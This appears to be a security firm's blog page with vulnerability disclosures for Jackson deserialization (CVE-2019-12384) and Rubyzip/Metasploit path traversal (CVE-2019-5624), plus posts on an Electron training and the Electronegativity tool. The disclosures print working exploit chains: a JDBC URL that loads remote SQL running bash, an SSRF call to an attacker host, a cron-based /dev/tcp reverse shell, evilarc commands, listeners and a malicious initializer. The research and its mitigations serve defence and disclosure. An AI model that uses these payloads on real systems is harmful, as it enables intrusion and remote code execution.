Jackson gadgets - Anatomy of a vulnerability

Jackson CVE-2019-12384: anatomy of a vulnerability class

During one of our engagements, we analyzed an application that used the Jackson library for deserializing JSON. In that context, we identified a deserialization vulnerability where we could control the class to be deserialized. In this article, we show how an attacker may leverage this deserialization vulnerability to trigger attacks such as Server-Side Request Forgery (SSRF) and remote code execution.

This research also resulted in a new CVE (CVE-2019-12384) and a number of RedHat products affected by it:

Vulnerability Impact

What is required?

As reported by Jackson’s author in On Jackson CVEs: Don’t Panic — Here is what you need to know, the requirements for a Jackson “gadget” vulnerability are:

  1. The application accepts JSON content sent by an untrusted client (composed either manually or by code you did not write and have no visibility or control over), meaning that you cannot constrain the JSON itself that is being sent

  2. The application uses polymorphic type handling for properties with a nominal type of java.lang.Object (or one of a small number of “permissive” tag interfaces such as java.io.Serializable or java.lang.Comparable)

  3. The application has at least one specific “gadget” class to exploit in the Java classpath. In detail, exploitation requires a class that works with Jackson; in fact, most gadgets only work with specific libraries, e.g. the most commonly reported ones work with JDK serialization

  4. The application uses a version of Jackson that does not (yet) block the specific “gadget” class. There is a set of published gadgets which grows over time, so it is a race between people finding and reporting gadgets and the patches. Jackson operates on a blacklist: deserialization is a “feature” of the platform, and the maintainers continually update a blacklist of known gadgets that people report.

In this research we assumed that preconditions (1) and (2) are satisfied, and concentrated instead on finding a gadget that could meet both (3) and (4). Please note that Jackson is one of the most widely used deserialization frameworks for Java applications, where polymorphism is a first-class concept. Finding these conditions comes at almost zero cost to a potential attacker, who may use static analysis tools or dynamic techniques, such as grepping for @class in requests/responses, to find such targets.

Preparing for the battlefield

During our research we developed a tool to assist the discovery of such vulnerabilities. When Jackson deserializes ch.qos.logback.core.db.DriverManagerConnectionSource, this class can be abused to instantiate a JDBC connection. JDBC stands for (J)ava (D)ata(b)ase (C)onnectivity. JDBC is a Java API for connecting to and executing queries against a database, and it is part of Java SE (Java Standard Edition). Moreover, JDBC uses automatic string-to-class mapping, which makes it a perfect target to load and execute even more “gadgets” inside the chain.
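
Concretely, with default typing enabled, such a polymorphic payload is simply a two-element JSON array naming the target class and its properties. This is the same payload used (in escaped form) in the commands shown later:

["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url": "jdbc:h2:mem:"}]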

In order to demonstrate the attack, we prepared a wrapper in which we load arbitrary polymorphic classes specified by an attacker. For the environment we used jRuby, a Ruby implementation running on top of the Java Virtual Machine (JVM). Thanks to its integration with the JVM, we can easily load and instantiate Java classes.

We’ll use this setup to load the Java classes in a given directory and prepare the Jackson environment to meet the first two requirements (1, 2) listed above. In order to do that, we implemented the following jRuby script.

require 'java'
Dir["./classpath/*.jar"].each do |f|
	require f
end
java_import 'com.fasterxml.jackson.databind.ObjectMapper'
java_import 'com.fasterxml.jackson.databind.SerializationFeature'

content = ARGV[0]

puts "Mapping"
mapper = ObjectMapper.new
mapper.enableDefaultTyping()
mapper.configure(SerializationFeature::FAIL_ON_EMPTY_BEANS, false);
puts "Serializing"
obj = mapper.readValue(content, java.lang.Object.java_class) # invokes all the setters
puts "objectified"
puts "stringified: " + mapper.writeValueAsString(obj)

The script proceeds as follows:

  1. At line 2, it loads all of the classes contained in the Java Archives (JAR files) within the “classpath” subdirectory
  2. Between lines 5 and 13, it configures Jackson so as to meet requirement (2)
  3. Between lines 14 and 17, it deserializes and then re-serializes a polymorphic Jackson object passed to the script as JSON

Memento: reaching the gadget

For this research we decided to use gadgets that are widely used by the Java community. All of the libraries targeted to demonstrate this attack are among the top 100 most common libraries in the Maven Central repository.

To follow along and prepare for the attack, you can download the required libraries (the Jackson databind library, logback-core, which provides the DriverManagerConnectionSource gadget, and the h2 database engine) and put them in the “classpath” directory.

It should be noted that the h2 library is not required to perform the SSRF, since our experience suggests that most Java applications load at least one JDBC driver. JDBC drivers are classes that are automatically instantiated when a JDBC URL is passed in, with the full URL handed to them as an argument.

Using the following command, we will call the previous script with the aforementioned classpath.

$ jruby test.rb "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:mem:\"}]"

On line 15 of the script, Jackson will recursively call all of the setters with the keys contained inside the subobject. To be more specific, setUrl(String url) is called with the attacker-controlled argument by the Jackson reflection machinery. After that phase (line 17), the full object is serialized into a JSON object again. At that point, all fields are serialized directly, if no getter is defined, or through an explicit getter. The interesting getter for us is getConnection(). In fact, as attackers, we are interested in all “non-pure” methods that have interesting side effects where we control an argument.
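
To make that flow concrete, the following jRuby sketch shows roughly what Jackson ends up doing through reflection (assuming the same “classpath” directory used above; this is an illustration, not Jackson’s actual internals):

require 'java'
Dir["./classpath/*.jar"].each { |f| require f }
java_import 'ch.qos.logback.core.db.DriverManagerConnectionSource'

source = DriverManagerConnectionSource.new  # default constructor, as used by Jackson
source.setUrl('jdbc:h2:mem:')               # setter invoked while deserializing the subobject
source.getConnection                        # getter invoked while re-serializing: opens the JDBC connection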

When getConnection() is called, an in-memory database is instantiated. Since the application is short-lived, we won’t see any meaningful effect from the attacker’s perspective. In order to do something more interesting, we can instead create a connection to a remote database. If the target application is deployed as a remote service, an attacker can trigger a Server-Side Request Forgery (SSRF). The following screenshot is an example of this scenario.

Jackson Chain
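
As a hedged example (the attacker-controlled hostname below is hypothetical), pointing the JDBC URL at a remote H2 TCP endpoint forces the target to open an outbound connection, which is the SSRF primitive:

$ jruby test.rb "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:tcp://attacker.example.com:9092/~/ssrf\"}]"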

Enter the Matrix: From SSRF to RCE

As you may have noticed, both of these scenarios lead to DoS and SSRF. While those attacks may affect the application’s security, we want to show a simple and effective technique to turn the SSRF into a full-chain RCE.

In order to gain full code execution in the context of the application, we employed the capability of loading the H2 JDBC driver. H2 is a fast SQL database usually employed as an in-memory replacement for full-fledged SQL database management systems (such as PostgreSQL, MSSQL, MySQL or OracleDB). It is easily configurable and supports many modes, such as in-memory, on-file, and remote server. H2 has the capability to run SQL scripts from the JDBC URL, a feature added in order to have in-memory databases that support init migrations. This alone won’t allow an attacker to actually execute Java code inside the JVM context. However, since H2 is implemented inside the JVM, it has the capability to specify custom aliases containing Java code. This is what we can abuse to execute arbitrary code.

We can easily serve the following inject.sql INIT file through a simple HTTP server, such as Python’s built-in one (e.g. python -m SimpleHTTPServer).

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
	String[] command = {"bash", "-c", cmd};
	java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
	return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('id > exploited.txt')

And run the tester application with:

$ jruby test.rb "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://localhost:8000/inject.sql'\"}]"
...
$ cat exploited.txt
uid=501(...) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),501(access_bpf),701(com.apple.sharepoint.group.1),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh)

Voilà!

Iterative Taint-Tracking

Exploitation of deserialization vulnerabilities is complex and takes time. When conducting a product security review, time constraints can make it difficult to find the appropriate gadgets to use in exploitation. On the other hand, the Jackson blacklists are updated on a monthly basis, while users of this mechanism (e.g. enterprise applications) may have yearly release cycles.

Deserialization vulnerabilities are the typical needle-in-the-haystack problem. Identifying a vulnerable entry point is an easy task, while finding a useful gadget may be time-consuming (and tedious). At Doyensec we developed a technique to find useful Jackson gadgets and facilitate the latter effort. We built a static analysis tool that can find serialization gadgets through taint-tracking analysis. We designed it to be fast enough to run multiple times, and to iterate and improve through a custom, extensible rule-set language. On average, a run on a 2018 MacBook Pro i7 takes 2 minutes.

Jackson Taint Tracking

Taint-tracking is a popular academic research subject, and academic research tools focus on very high recall and precision. The trade-off lies between high recall/precision on one side and speed/memory on the other. Since we wanted this tool to be usable while testing commercial-grade products, and we valued the customizability of the tool itself, we focused on speed and usability instead of high recall. While the tool is inspired by other research such as FlowDroid, the goal of our technique is not to rule out the human analyst. Instead, we believe in augmenting manual testing and exploitation with customizable security automation.

This research was possible thanks to the 25% research time at Doyensec. Tune in again for new episodes.

That’s all folks! Keep it up and be safe!


Electron Security Workshop

2-Day Training on How to Build Secure Electron Applications

We are excited to present our brand-new class on Electron Security! This blog post provides a general overview of the 2-day workshop.

ElectronJS Logo

With the increasing popularity of the ElectronJS framework, we decided to create a class that teaches students how to build and maintain secure desktop applications that are resilient to attacks and common classes of vulnerabilities. Building secure Electron applications is possible, but complicated. You need to know the framework, follow its evolution, and constantly update and devise defense-in-depth mechanisms to mitigate its deficiencies.

Our training begins with an overview of Electron internals and the life cycle of a typical Electron-based application. After a quick intro, we will jump straight into threat modeling and attack surface analysis. We will analyze the common root causes of misconfigurations and vulnerabilities. The class is centered around two main topics: subverting the framework and breaking the custom application code. We will present security misconfigurations, security anti-patterns, nodeIntegration and sandbox bypasses, insecure preload bugs, prototype pollution attacks, affinity abuses and much more.

The class is hands-on with many live examples. The exercises and scenarios will help students understand how to identify vulnerabilities and build mitigations. Throughout the class, we will also have a few Q&A panels to answer all questions attendees might have and potentially review their code.

If you’re interested, check out this short teaser:

Audience Profile

Who should take this course?

  • JavaScript and Node.js Developers
  • Security Engineers
  • Security Auditors and Pentesters

We will provide details on how to find and fix security vulnerabilities, which makes this class suitable for both blue and red teams. Basic JavaScript development experience and a basic understanding of web application security (e.g. XSS) are required.

General Information

Attendees will receive a bundle with all material, including:

  • Workshop presentation (over 200 slides)
  • Code, exploits and artifacts of all exercises
  • Certificate of completion

This 2-day training is delivered in English, either remotely or on-site (worldwide).

Doyensec will accept up to 15 attendees per tutor. If the number of attendees exceeds the maximum allowed, Doyensec will allocate additional tutors.

We’re a flexible security boutique and can further customize the agenda to your specific company’s needs.

Feel free to contact us at info@doyensec.com for scheduling your class!


Electronegativity 1.3.0 released!

After the first public release of Electronegativity, we had a great response from the community, and the tool quickly became a baseline for Electron application security reviews among many professionals and organizations. This pushed us to keep improving Electronegativity and expanding our research in the field. Today we are proud to release version 1.3.0, with many new improvements and security checks for your Electron applications.


We’re also excited to announce that the tool has been accepted for Black Hat USA Arsenal 2019, where it will be showcased at the Mandalay Bay in Las Vegas. We’ll be at Arsenal Station 1 on August 7, from 4:00 pm to 5:20 pm. Drop by to see live demonstrations of Electronegativity hunting real Electron applications for vulnerabilities (or just to say hi and collect Doyensec socks)!

If you’re simply interested in trying out what’s new in Electronegativity, go ahead and update or install it using NPM:

$ npm install @doyensec/electronegativity -g
# or
$ npm update @doyensec/electronegativity -g

To review your application, use the following command:

$ electronegativity -i /path/to/electron/app

What’s New

Electronegativity 1.1.1 initially shipped with 27 unique checks. Now it counts over 40 checks and features a new advanced check system that improves the tool’s detection capabilities by weeding out false positive and false negative findings. Here is a brief list of what’s new in this 1.3.0 release:

  • Every check now has an importance and an accuracy attribute, which help the auditor determine the significance of each finding. Consequently, we also introduced new command line flags to filter the results by severity (--severity) and by confidence (--confidence), useful for tailored Electronegativity integration in your application security pipelines or build systems.
  • We introduced a new class of checks called GlobalChecks, which can dynamically set the severity and confidence of findings, or create new ones, considering the inherent security risk posed by their interaction (e.g. cross-checking the nodeIntegration and sandbox flag values, or the presence of the affinity flag used across different windows).
  • Variable scoping analysis capabilities have been added to inspect the Function and Global variable content, when available.
  • A new single-check scan mode is now provided by passing the -l flag along with a list of enabled checks (e.g. -l "AuxClickJsCheck,AuxClickHtmlCheck"). Another command line flag has been introduced to show relative paths for files (-r). See the example after this list.
  • Electron’s newly introduced BrowserView component, meant to be an alternative to the WebView tag, is now supported. The tool also detects the use of the nodeIntegrationInSubFrames experimental option for enabling NodeJS support in sub-frames (e.g. an iframe inside a webview object).
  • Various bug fixes and new checks! (see below)
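
For example, combining the options above, a scan limited to the auxclick checks that reports relative file paths can be launched as follows:

$ electronegativity -i /path/to/electron/app -l "AuxClickJsCheck,AuxClickHtmlCheck" -r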

Updated Checks

This new release also comes with new and updated checks. As always, a knowledge-base containing information around risk and auditing strategy has been created for each class of vulnerabilities.

Affinity Check

When specified, renderers with the same affinity will run in the same renderer process. Because the renderer process is reused, certain webPreferences options will also be shared between the web pages even when you specify different values for them. This can lead to unexpected security configuration overrides:

Affinity Property Vulnerability

In the above demo, the affinity set between the two BrowserWindow objects causes the nodeIntegration property value to be unintentionally shared. Electronegativity will now issue a finding reporting the usage of this flag if present.

Read more on the dedicated AFFINITY_GLOBAL_CHECK wiki page.

AllowPopups Check

When the allowpopups attribute is present, the guest page will be allowed to open new windows. Popups are disabled by default.

Read more on the ALLOWPOPUPS_HTML_CHECK wiki page.

Missing Electron Security Patches Detection

This check detects whether security patches are available for the Electron version used by the target application. Starting with this release, we switched from manually updating a file of safe releases to a routine that automatically fetches the latest releases from Electron’s official repository and determines, at each run, whether security patches are available.

Read more on the AVAILABLE_SECURITY_FIXES_GLOBAL_CHECK and ELECTRON_VERSION_JSON_CHECK wiki pages.

Check for Custom Command Line Arguments

This check will compare the custom command line arguments set in the package.json scripts and configuration objects against a blacklist of dangerous arguments. The use of additional command line arguments can increase the application attack surface, disable security features or influence the overall security posture.

Read more on the CUSTOM_ARGUMENTS_JSON_CHECK wiki page.

CSP Presence Check and Review

Electronegativity now checks if a Content Security Policy (CSP) is set as an additional layer of protection against cross-site scripting and data injection attacks. If a CSP is detected, it will look for weak directives by using a new library based on the csp-evaluator.withgoogle.com online tool.

Read more on the CSP_GLOBAL_CHECK wiki page.

Dangerous JS Functions called with user-supplied data

Looks for occurrences of insertCSS, executeJavaScript, eval, Function, setTimeout, setInterval and setImmediate with user-supplied input.

Read more on the DANGEROUS_FUNCTIONS_JS_CHECK wiki page.

Check for mitigations set to limit the navigation flows

Detects if the on() handler for will-navigate and new-window events is used. This setting can be used to limit the exploitability of certain issues. Not enforcing navigation limits leaves the Electron application under full control of remote origins in case of accidental navigation.

Read more on the LIMIT_NAVIGATION_GLOBAL_CHECK and LIMIT_NAVIGATION_JS_CHECK wiki pages.

Detects if Electron’s security warnings have been disabled

The tool will check if Electron’s warnings and recommendations printed to the developer console have been force-disabled by the developer. Disabling these warnings may hide the presence of misconfigurations or insecure patterns from the developers.

Read more on the SECURITY_WARNINGS_DISABLED_JS_CHECK and SECURITY_WARNINGS_DISABLED_JSON_CHECK wiki pages.

Detects if setPermissionRequestHandler is missing for untrusted origins

Not enforcing custom checks for permission requests (e.g. media) leaves the Electron application under full control of the remote origin. For instance, a Cross-Site Scripting vulnerability can be used to access the browser media system and silently record audio/video. Because of this, Electronegativity will also check if a setPermissionRequestHandler has been set.

Read more on the PERMISSION_REQUEST_HANDLER_GLOBAL_CHECK wiki page.

…and more to come! If you are a developer, we encourage you to use Electronegativity to understand how these Electron security pitfalls affect your application and how to avoid them. We really believe that Electron deserves a strong security community behind it, and that creating the right, robust tools to help this community is the first step towards improving the security stance of the whole Electron ecosystem.

As a final remark, we’d like to thank all past and present contributors to this tool: @ikkisoft, @p4p3r, @0xibram, @yarlob, @lorenzostella, and ultimately @Doyensec for sponsoring this release.

See you in Vegas!

@lorenzostella


On insecure zip handling, Rubyzip and Metasploit RCE (CVE-2019-5624)

During one of our projects we had the opportunity to audit a Ruby-on-Rails (RoR) web application handling zip files with the Rubyzip gem. Zip files have always been an interesting entry point for triggering multiple vulnerability types, including path traversals and symlink file overwrite attacks. As the library under testing had symlink processing disabled, we focused on path traversal exploitation.

This blog post discusses our results, the “bug” discovered in the library itself, and the implications of such an issue in a popular piece of software: Metasploit.


Rubyzip and old vulnerabilities

The Rubyzip gem has a long history of path traversal vulnerabilities (1, 2) through malicious filenames. Particularly interesting was the code change in PR #376, where the developers implemented a different handling.

# Extracts entry to file dest_path (defaults to @name).
# NB: The caller is responsible for making sure dest_path is safe, 
# if it is passed.
def extract(dest_path = nil, &block)
    if dest_path.nil? && !name_safe?
        puts "WARNING: skipped #{@name} as unsafe"
        return self
    end

[...]

Entry#name_safe is defined a few lines before as:

# Is the name a relative path, free of `..` patterns that could lead to
# path traversal attacks? This does NOT handle symlinks; if the path
# contains symlinks, this check is NOT enough to guarantee safety.
def name_safe?
    cleanpath = Pathname.new(@name).cleanpath
    return false unless cleanpath.relative?
    root = ::File::SEPARATOR
    naive_expanded_path = ::File.join(root, cleanpath.to_s)
    cleanpath.expand_path(root).to_s == naive_expanded_path
end

In the code above, if the destination path is passed to the Entry#extract function, then it is not actually checked. A comment in the source code of that function highlights the user’s responsibility:

# NB: The caller is responsible for making sure dest_path is safe, if it is passed.

While Entry#name_safe is a fair check against path traversals (and absolute paths), it is only executed when the function is called without arguments.

In order to verify the library bug, we generated a ZIP PoC using the old (and still good) evilarc and extracted the malicious file using the following code:

require 'zip'

first_arg, *the_rest = ARGV

Zip::File.open(first_arg) do |zip_file|
  zip_file.each do |entry|
    puts "Extracting #{entry.name}"
    entry.extract(entry.name)
  end
end

$ ls /tmp/file.txt
ls: cannot access '/tmp/file.txt': No such file or directory
$ zipinfo absolutepath.zip 
Archive:  absolutepath.zip
Zip file size: 289 bytes, number of entries: 2
drwxr-xr-x  2.1 unx        0 bx stor 18-Jun-13 20:13 /tmp/
-rw-r--r--  2.1 unx        5 bX defN 18-Jun-13 20:13 /tmp/file.txt
2 files, 5 bytes uncompressed, 7 bytes compressed:  -40.0%
$ ruby Rubyzip-poc.rb absolutepath.zip 
Extracting /tmp/
Extracting /tmp/file.txt
$ ls /tmp/file.txt
/tmp/file.txt

This results in a file being created at /tmp/file.txt, which confirms the issue.

As happened with our client, most developers might have upgraded to Rubyzip 1.2.2 thinking it was safe to use, without actually verifying how the library works or how it is used in their codebase.

It would have been vulnerable anyway ¯\_(ツ)_/¯

In the context of our web application, the user-supplied zip was decompressed through the following (pseudo) code:

def unzip(input)
    uuid = get_uuid()
    # 0. create a 'Pathname' object with the new uuid
    parent_directory = Pathname.new("#{ENV['uploads_dir']}/#{uuid}")

    Zip::File.open(input[:zip_file].to_io) do |zip_file|
        zip_file.each_with_index do |entry, index|
            # 1. check the file is not present
            next if File.file?(parent_directory + entry.name)
            # 2. extract the entry
            entry.extract(parent_directory + entry.name)
        end
    end
    Success
end

In item #0 we can see that a Pathname object is created and then used as the destination path of the decompressed entry in item #2. However, the + operator between Pathname objects and strings does not work as many developers would expect and might result in unintended behavior.

We can easily understand its behavior in an IRB shell:

$ irb
irb(main):001:0> require 'pathname'              
=> true
irb(main):002:0> parent_directory = Pathname.new("/tmp/random_uuid/")
=> #<Pathname:/tmp/random_uuid/>
irb(main):003:0> entry_path = Pathname.new(parent_directory + File.dirname("../../path/traversal"))
=> #<Pathname:/path>
irb(main):004:0> destination_folder = Pathname.new(parent_directory + "../../path/traversal")
=> #<Pathname:/path/traversal>
irb(main):005:0> parent_directory + "../../path/traversal"
=> #<Pathname:/path/traversal>

Thanks to Pathname’s interpretation of ../, the argument of Rubyzip’s Entry#extract call does not contain any path traversal payload, which results in a path that is mistakenly assumed to be “safe”. Since the gem does not perform any validation, the exploitation does not even require this unexpected path concatenation.

From Arbitrary File Write to RCE (RoR Style)

Apart from the usual *nix- and Windows-specific techniques (like writing a new cronjob or exploiting custom scripts), we were interested in understanding how we could leverage this bug to achieve RCE in the context of a RoR application.

Since our target was running in production environments, RoR classes were cached on first usage via the cache_classes directive. During the time allocated for the engagement we didn’t find a reliable way to load/inject arbitrary code at runtime via file write without requiring a RoR reboot.

However, we did verify in a local testing environment that chaining together a Denial of Service vulnerability and a full path disclosure of the web app root can be used to trigger the web server reboot and achieve RCE via the aforementioned zip handling vulnerability.

The official documentation explains that:

After it loads the framework plus any gems and plugins in your application, Rails turns to loading initializers. An initializer is any file of ruby code stored under /config/initializers in your application. You can use initializers to hold configuration settings that should be made after all of the frameworks and plugins are loaded.

Using this feature, an attacker with the right privileges can add a malicious .rb file in the config/initializers folder, which will be loaded at web server (re)boot.
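
As a hedged illustration (the file name and command below are hypothetical choices of ours), such a dropped initializer could be as simple as:

# config/initializers/zzz_backdoor.rb - hypothetical malicious initializer
# Rails loads every .rb file under config/initializers at (re)boot,
# so this command runs in the context of the application user.
system('id > /tmp/initializer_poc.txt')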

Attacking the attackers. Metasploit Authenticated RCE (CVE-2019-5624)

Just after the end of the engagement and with the approval of our customer, we started looking at popular software that was likely affected by the Rubyzip bug. As we were brainstorming potential targets, an icon on one of our VMs caught our attention: Metasploit Framework

Going through the source code, we were able to quickly identify several files that use the Rubyzip library to create ZIP files. Since our vulnerability resides in the extract function, we recalled an option to import a ZIP workspace from previous MSF versions or from different instances. We identified the corresponding code path in the zip.rb file (line 157), which is responsible for importing a Metasploit ZIP file:

 data.entries.each do |e|
      target = ::File.join(@import_filedata[:zip_tmp], e.name)
      data.extract(e,target)

As with the vanilla Rubyzip example, creating a ZIP file containing a path traversal payload and embedding a valid MSF workspace (an XML file containing the exported info from a scan) made it possible to obtain a reliable file-write primitive. Since the extraction is done as root, we could easily obtain remote command execution with high privileges using the following steps:

  1. Create a file with the following content:
    * * * * * root /bin/bash -c "exec /bin/bash 0</dev/tcp/172.16.13.144/4444 1>&0 2>&0 0<&196;exec 196<>/dev/tcp/172.16.13.144/4445; bash <&196 >&196 2>&196"
  2. Generate the ZIP archive with the path traversal payload:
    python evilarc.py exploit --os unix -p etc/cron.d/
  3. Add a valid MSF workspace to the ZIP file (in order to have MSF extract it; otherwise it will refuse to process the ZIP archive)
  4. Set up two listeners, one on port 4444 and the other on port 4445 (the one on port 4445 will receive the reverse shell); see the example after this list
  5. Log in to the MSF web interface
  6. Create a new “Project”
  7. Select “Import”, then “From file”, choose the evil ZIP file and finally click the “Import” button
  8. Wait for the import process to finish
  9. Enjoy your reverse shell
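
For step 4, two plain netcat listeners are enough to catch the connect-back (a hedged example; flags vary slightly between netcat flavors, and any TCP listener will do):

$ nc -lvp 4444   # first stage
$ nc -lvp 4445   # receives the reverse shell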


Conclusions

If you are using Rubyzip, check how the library is used and perform additional validation of the entry name and the destination path before calling Entry#extract.
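
A minimal sketch of such a validation (the helper below is our own, hypothetical example, not part of Rubyzip) rejects any entry whose resolved destination escapes the intended directory:

require 'zip'
require 'fileutils'

# Extract an entry only if its fully-resolved destination stays below dest_dir.
def safe_extract(entry, dest_dir)
  dest_dir  = File.expand_path(dest_dir)
  dest_path = File.expand_path(File.join(dest_dir, entry.name))
  unless dest_path.start_with?(dest_dir + File::SEPARATOR)
    raise "Blocked potentially unsafe entry: #{entry.name}"
  end
  FileUtils.mkdir_p(File.dirname(dest_path))
  entry.extract(dest_path)
end

Zip::File.open(ARGV[0]) do |zip_file|
  zip_file.each { |entry| safe_extract(entry, '/tmp/safe_output') }
end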

Here is a small recap of the different scenarios (as of Rubyzip v1.2.2):

Usage                  Input by user?                    Vulnerable to path traversal?
entry.extract(path)    yes (path)                        yes
entry.extract(path)    partially (path is concatenated)  maybe
entry.extract()        partially (entry name)            no
entry.extract()        no                                no

If you’re using Metasploit, it is time to patch. We look forward to seeing an MSF module for CVE-2019-5624.

Credits and References

Credit for the research and bugs go to @voidsec and @polict.

This work has been performed during a customer engagement and Doyensec 25% Research Time. As such, we would like to thank our customer and Metasploit maintainers for their support.

If you’re interested in the topic, take a look at the following resources: